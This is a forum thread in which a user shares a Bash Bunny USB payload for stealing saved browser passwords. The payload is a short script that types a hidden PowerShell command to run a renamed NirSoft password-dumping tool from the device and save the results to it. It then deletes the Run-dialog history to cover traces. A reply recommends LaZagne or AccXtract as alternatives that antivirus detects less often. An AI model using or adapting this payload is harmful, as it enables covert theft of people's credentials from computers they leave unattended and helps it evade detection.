washplant26 Posted September 9, 2017 Share Posted September 9, 2017 Author Justin Hynes credit: Darren Kitchen and www.nirsoft.net This allows you to get passwords from browers within seconds! This is my very first payload and I have tested it on the new bash bunny and so far it works without a problem There is few thing you need though in order to have this payload working 1 you need the name your bash bunny uf so that the passwords get saved to the correct place. 2. http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip 3 You need to put the s.exe(very important that you keep it that name) in the home directory of the bash bunny The payload must be in switch 1 or switch 2 but the s.exe software must be put in the home directory Well that is it. Thanks Darren Kitchen and Shannon Morese for all of the youtube videos. :) very helpful. LED R 100 ATTACKMODE HID STORAGE QUACK DELAY 1000 QUACK GUI r QUACK DELAY 75 QUACK STRING "powershell -windowstyle hidden "'$D'" =Get-WMIObject Win32_Volume | ? { "'$_.Label'" -eq 'uf' } | select name;cd "'$D.name'";./s /stext p;Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" QUACK ENTER LED G Quote Link to comment Share on other sites More sharing options...
RazerBlade Posted September 10, 2017 Share Posted September 10, 2017 Just so you know, the nirsoft tools get detected almost right away when trying to execute the program. Maybe look into Accxtract https://github.com/garrett-davidson/AccXtract or LaZagne https://github.com/AlessandroZ/LaZagne which in my experience doesn't get detected so often Quote Link to comment Share on other sites More sharing options...
washplant26 Posted September 10, 2017 Author Share Posted September 10, 2017 Thanks I will look into that. Any other suggestions is highly appreciated. :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.